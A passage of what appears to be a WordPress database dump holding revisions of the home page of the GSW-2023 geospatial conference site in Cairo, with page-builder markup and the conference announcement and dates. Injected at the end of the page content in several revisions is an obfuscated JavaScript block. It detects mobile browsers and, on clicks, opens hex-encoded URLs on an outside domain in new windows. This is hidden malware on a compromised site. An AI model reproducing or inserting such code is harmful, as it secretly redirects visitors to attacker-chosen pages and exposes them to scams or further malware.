_0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 18:43:07','2022-11-09 18:43:07','',3066,'https://gsw2023.com/?p=3194',0,'revision','',0),
(3195,1,'2022-11-09 18:47:33','2022-11-09 18:47:33','[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]\r\n<h2><strong> EGYPT GSW\'2023</strong></h2>\r\n[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]\r\n<h3></h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION FEES\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]Opening of registration platform: soon[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1665815238858{padding-top: 40px !important;padding-bottom: 40px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#ffffff\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"white\" style=\"shadow\" border_width=\"10\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#311b92\" tick_col=\"#ffffff\" tick_sep_col=\"#eeee22\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#eeee22\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-09 18:47:33','2022-11-09 18:47:33','',3066,'https://gsw2023.com/?p=3195',0,'revision','',0),
(3196,1,'2022-11-09 18:59:11','2022-11-09 18:59:11','[vc_row css=\".vc_custom_1668005747937{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text]\r\n<h2><strong> EGYPT GSW\'2023</strong></h2>\r\n[rev_slider alias=\"gsw2023-1\" slidertitle=\"gsw23\"][/rev_slider]\r\n<h3></h3>\r\n[/vc_column_text][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"right\" css=\".vc_custom_1668010492701{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#3724e5\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1667948825977{margin-top: 25px !important;}\"][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner][vc_column_text]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\r\n[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668017539766{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]\r\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\r\n[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): March 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives): April 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3162\" img_size=\"1149x800\"][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: 